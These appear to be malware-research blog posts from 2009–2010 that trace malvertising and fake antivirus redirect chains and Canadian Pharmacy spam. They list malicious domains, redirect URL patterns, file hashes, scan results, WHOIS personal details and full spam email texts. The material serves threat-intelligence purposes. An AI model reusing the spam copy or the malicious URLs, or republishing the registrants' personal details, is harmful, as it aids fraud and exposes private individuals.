Registrant Email:chan.wai.kay.1@gmail.com
______________________________

add-block-filter.info - 212.117.163.165

Created On:15-Mar-2009 18:49:45 UTC
Last Updated On:15-May-2009 03:27:23 UTC
Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. dba PublicDomainRegistry.com (R159-LRMS)
Name Server:NS1.ADD-BLOCK-FILTER.INFO - NS2.ADD-BLOCK-FILTER.INFO
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Email:contact@privacyprotect.org

______________________________

hospitalhotspot.com - 213.163.91.205

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.CODDNS.COM - NS2.CODDNS.COM
Creation Date: 20-aug-2009

Registrant: Andrew (andrewfairg@yahoo.co.uk)
Unit A1 The Workshops
London
London,W12 9DP
GB
Tel. +44.2087437597
______________________________

kzayopoq.cn / ccikudor.cn - 195.88.191.46

egistrant Organization: 海盐新明制造厂
Registrant Name: 张群
Administrative Email: ujangn@126.com
Sponsoring Registrar: 易名中国
Name Server:ns1.vvukufan.com - ns2.vvukufan.com
Registration Date: 2009-09-10 21:39
Expiration Date: 2010-09-10 21:39

Special thanks fly out to antnet for assisting me with the javascript / Shellcode

the-eagles.cn - 94.102.48.29

A small update on The New York Times malvertizement attack from last weekend.

After sex-in-the-city.cn and russell-brand.cn we now have the-eagles.cn. From there we are redirected to 6cleanspyware.com.

Like everyone else I have been reading the different reports about the incident at the New York Times and let me get one thing straight: the bad guys don't swap or replace ads with bad ones, neither do they inject code in streams.

They rather add code to an existing page or activate a new webpage when the malvertizements go live if the banner itself is not a malicious Flash file. But it's so easy and convenient though to say my ads have been "poisoned" or whatever instead to admit that your advertisement department screwed up in the first place by not performing security check on everything.

the-eagles.cn - 94.102.48.29

Created: 2009-09-11
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server:ns3.freedns.ws - ns4.freedns.ws - ns1.freedns.ws - ns2.freedns.ws

hostnames sharing ip with a-records

adeptofmastery.cn | antivirusscannerv9.com | bestpersonalprotectionv7.com | beststarwars.cn | bulkdvdreader.cn | fastvirusscanv6.com | firstspywarescannerv1.com | govirusscanner.com | onlineantispywarescanv6.com | onlinebestscannerv3.com | onlinepersonalscanner.com | onlineproantivirusscan.com | personalfolderscanv2.com | personalonlinescanv3.com | private-antivirus-scannerv2.com | russell-brand.cn | secure-antispyware-scanv3.com | securefolderscannerv6.com | sex-and-the-city.cn | sitemechanics.cn | space2009city.cn | spyware-scannerv2.com | teacherslounge.cn | totalsecurityscannerv3.com | we-accepted.cn | willsmithinc.cn

6cleanspyware.com - 206.217.201.136

Created: 2009-09-16
Name Server:ns3.freedns.ws - ns4.freedns.ws - ns1.freedns.ws - ns2.freedns.ws
Name: Pery Z Jenny
Organization: n/a
Address: Xian CITS. 48 Changan Road
City: Xian
Province/state: Xian
Country: CN
Postal Code: 710061
Phone: +8.6298522311
Fax: +8.6298522311

Clicksor Interstitial Advert leads to malware

A Clicksor Interstitial Advert is currently redirecting people to a fake online scanner hosted at online-defense7.com. Back in Apr 26 2008 I blogged about a similar incident.

Note: Don't click on the fake warnings, they trigger a file download. Just click the skip this ad button.

A closer look at the source code shows us which links we need to follow in our network capture to track down all the websites involved in the browser hijack / redirect.

The network capture reveals that we are redirected to adrpxts.com.

The requested page contains some escaped code which immediately should ring a bell btw if you see / read this as an advertiser.

Below are the corresponding unescaped strings.

A-Install-c8d161_2001-8.exe

File size: 177664 bytes
MD5...: 7fa31700cd671c2e9498cb04ebf987a5
SHA1..: 1443bf8eb3a443d9abe5677372021c1d38f6e7f8
SHA256: 4929b356f751f04017daf92251d0e597ebeed06fe662b6f9ddb793103522850f
PEiD..: -

QUOTE

File A-Install-c8d161_2001-8.exe received on 2009.11.05 12:19:32 (UTC)
a-squared 4.5.0.41 2009.11.05 -
AhnLab-V3 5.0.0.2 2009.11.05 -
AntiVir 7.9.1.53 2009.11.05 -
Antiy-AVL 2.0.3.7 2009.11.05 -
Authentium 5.2.0.5 2009.11.05 -
Avast 4.8.1351.0 2009.11.05 -
AVG 8.5.0.423 2009.11.05 -
BitDefender 7.2 2009.11.05 -
CAT-QuickHeal 10.00 2009.11.05 -
ClamAV 0.94.1 2009.11.05 -
Comodo 2848 2009.11.05 -
DrWeb 5.0.0.12182 2009.11.05 -
eTrust-Vet 35.1.7103 2009.11.04 -
F-Prot 4.5.1.85 2009.11.04 -
F-Secure 9.0.15370.0 2009.11.04 -
Fortinet 3.120.0.0 2009.11.05 -
GData 19 2009.11.05 -
Ikarus T3.1.1.74.0 2009.11.05 -
Jiangmin 11.0.800 2009.11.05 -
K7AntiVirus 7.10.888 2009.11.04 -
Kaspersky 7.0.0.125 2009.11.05 -
McAfee 5792 2009.11.04 -
McAfee+Artemis 5792 2009.11.04 -
McAfee-GW-Edition 6.8.5 2009.11.05 -
Microsoft 1.5202 2009.11.05 -
NOD32 4575 2009.11.05 a variant of Win32/Kryptik.AWY
Norman 6.03.02 2009.11.05 -
nProtect 2009.1.8.0 2009.11.05 -
Panda 10.0.2.2 2009.11.04 -
PCTools 7.0.3.5 2009.11.05 -
Prevx 3.0 2009.11.05 -
Rising 21.54.33.00 2009.11.05 -
Sophos 4.47.0 2009.11.05 -
Sunbelt 3.2.1858.2 2009.11.05 -
Symantec 1.4.4.12 2009.11.05 -
TheHacker 6.5.0.2.061 2009.11.05 -
TrendMicro 9.0.0.1003 2009.11.05 -
VBA32 3.12.10.11 2009.11.04 -
ViRobot 2009.11.5.2023 2009.11.05 -
VirusBuster 4.6.5.0 2009.11.04 -

Links

adrpxts.com/cmp/click.php?id=[*]
adrpxts.com/cmp/scr.php?a=11&lang=en-us&id=[*]&ref=[*]
wamericana.cn/go.php?id=[*]&key=[*]&p=[*]
online-defense7.com/2/?sess=[*]

adrpxts.com - 213.175.211.76

Registrar: BIZCN.COM, INC.
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Updated Date: 27-aug-2009
Creation Date: 27-aug-2009

Registrant Contact:
Privat person
Mark Hollis info@azerllc.com
+1301723412 fax: +1301723412
412 17th Street, Suite 412
Denver CO 80202
us

hostnames sharing ip with a-records

adagenetwork.com | advertisefront.com | aeroadscampaigns.com | cheezheadmedia.com | chronoad.com | classifiedclicksor.com | corpusaads.com | coworkingads.com | creativebulkads.com | jetlevelads.com | pinayforclicks.com | sciencebizads.com | socialverclick.com

wamericana.cn - 94.102.58.252

ROID: 20091101s10001s72359905-cn
Administrative Email: padovano@BeachTrip.se
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Registration Date: 2009-11-01 18:56
Expiration Date: 2010-11-01 18:56

inetnum: 94.102.57.0 - 94.102.59.255
netname: NL-ECATEL
descr: ECATEL LTD
descr: Dedicated servers
country: NL

hostnames sharing ip with a-records

green-pepper.cn | humpback2009.cn | malware-url.com | planterstyle.cn | weddingcake2009.cn

online-defense7.com - 89.248.168.20 - 89.248.162.147

Registrar: TODAYNIC.COM, INC.
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET Updated Date: 04-nov-2009
Creation Date: 04-nov-2009

Queried whois.todaynic.com with "online-defense7.com"...
Query error: TimedOut

inetnum: 89.248.168.0 - 89.248.168.255
netname: NL-ECATEL
descr: AS29073, Ecatel LTD
country: NL

hostnames sharing ip with a-records

006antivirus.com | be-secured2.com | get-secure2.com | installprotection2.com | scan-spyware2.com | winscanner01.com | winscanner18.com | your-protection8.com

Today while doing some research on the Google Trends and BlackHat SEO I ran into a redirect using a Flash file again. We will use surfseek.net/menu.swf as an example for our analysis.
In the network capture we can see that 2 flash vars being defined. We are interested by the var called "l" which seems to be nothing else than garbage.

When we analyse the action script we see that they wrote a string replace function and once decoded we obtain surfseek.net/search.php?q=jaimee+grubbs+pics and getURL is then used to load the decoded link.

It is the first time though that I see the flash file as a referer in the network capture ...

The Canadian Pharmacy is the number one affiliate program for spammers. They are often refered to as Spamit & Glavmed. For those interested, may I suggest the following interesting reading:

• Canadian_Pharmacy
• SpamIt Must Fall

From.

Your own email address.

Subject.

• Get bone-on that lasts
• Cultivate your male energy
• Your male hormonal boost
• Feel excitement of love again
• Hottest selling tips on net
• See Britney n'ked

Body.

• What deals on remedies have we prepared for you?
  We have 30%, 40% and even 60% off, depending on what exact solution from our 400-name spectrum you may want.
  Buy and get your package via airmail or messenger service to your door!
  img46.imageshack.us/img46/4050/pallotto.swf
  
  
• Overpriced medicants are sold everywhere; cures on super prices are sold in our store!
  Big selection of branded solutions for managing viruses and anxiety, hypertension and male vigor problems, fungi and many more illnesses!
  Choose this online-store and you will never overpay
  img94.imageshack.us/img94/627/freilino.swf
  
  
• Something like viruses or allergy bothers your normal life?
  With our portal you will get rid of such problems problems fast!
  Click, find and buy!
  With our wide selection of brands and lowered prices you will always be a satisfied buyer!
  img714.imageshack.us/img714/1056/jeska.swf
  
  
• Something like viruses or other infections disturbs your normal life?
  With our store you will remove problems fast!
  Click, find and purchase!
  With our wide variety of products and lowered prices you will always be a satisfied purchaser!
  img192.imageshack.us/img192/1740/hussian.swf
  
  
• Overpriced remedies are sold everywhere; cures on good prices are sold here!
  Wide range of brands for fighting viruses and stress, high blood pressure and male vigor problems, fungi and many more illnesses!
  Choose this online-portal and you will never overpay
  img716.imageshack.us/img716/3880/ryburn.swf
  
  
• There are many stores on the Web, ready to bring medicants to your house, but only we offer:
  -Confidential packing and your prescription is not the thing we need to see!
  -Low prices on branded pilules!
  -Lots of hot deals all February!
  It's easy to purchase, when there are deals like these!
  img46.imageshack.us/img46/8724/shrewsberry.swf
  
  
• What deals on cures have we prepared for you?
  We have 30%, 40% and even 60% off, depending on what exact solution from our 400-name assortment you may want.
  Buy and get your package via airmail or courier service to your house!
  img192.imageshack.us/img192/6794/quinlin.swf

Mail.

Website.

Flash File.

Nothing special here, the code isn't even obfuscated. The website www.pilldirectwish.com is loaded using Geturl and onload. The email being in plain text, the website does not automatically load, you have to click on the link.

We can trace back its origin to Russia by looking at the font used.

Contact details and orders.

Although the 650 area code belongs to the state of California (CA), the website is hosted in Latvia with Chinese Whois information. Furthermore, when placing an order I never saw a single https request even though the website states that they are using a SECURE order form.

Sounds really trustworthy isn't it? Think twice before handing out your credit card, personal details and eventually putting your health at risk.

Virustotal Results

File shrewsberry.swf received on 2010.02.17 10:55:11
Result: 0/39 (0%)

pilldirectwish.com - 188.130.250.230

Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Name Server: NS1.SAMERADIO.COM - NS2.SAMERADIO.COM - NS3.THUSSELL.COM - NS4.THUSSELL.COM
Creation Date: 04-feb-2010

Queried whois.dns.com.cn with "pilldirectwish.com"...

Organisation Name.... zhao jiehai
Organisation Address. xiangyangbeilu6
Organisation Address. dalian
Organisation Address. 116026
Organisation Address. LN
Organisation Address. CN
Admin Email.......... jilaheg@126.com
Admin Phone.......... +86.41188205026
Admin Fax............ +86.41188205026

Queried whois.ripe.net with "-B 188.130.250.230"...

inetnum: 188.130.250.0 - 188.130.251.255
netname: FASTMEDIA-NET
descr: FASTMEDIA - Internet Service Provider
country: LV
admin-c: VL3915-RIPE
tech-c: VL3915-RIPE
status: ASSIGNED PA
mnt-by: FASTMEDIA-MNT
mnt-routes: FASTMEDIA-MNT
mnt-domains: FASTMEDIA-MNT
changed: hostmaster@fasthosting.lv 20091111
source: RIPE

person: Viktors Lihochevs
address: FASTMEDIA SRL
address: O.Kalpaka 68/70
address: LV3400, Latvia
phone: +371 28212172
abuse-mailbox: abuse@fasthosting.lv
e-mail: hostmaster@fasthosting.lv
nic-hdl: VL3915-RIPE
changed: hostmaster@fasthosting.lv 20090727
source: RIPE

my-order-status.info - 195.95.155.16

Sponsoring Registrar:DirectNIC, LTD (R152-LRMS)
Created On:21-Jan-2009 10:45:09 UTC
Last Updated On:04-Jan-2010 08:51:27 UTC
Registrant Name:Direct Privacy LTD Direct Privacy ID 6791C
Registrant Organization:Direct Privacy ID 6791C
Registrant Street1:PO Box 12068
Registrant City:George Town
Registrant State/Province:Grand Cayman
Registrant Postal Code:KY1-1010
Registrant Country:KY
Registrant Phone:+1.13457456022
Registrant Phone Ext.:
Registrant Email:my-order-status.info@directnicprivacy.com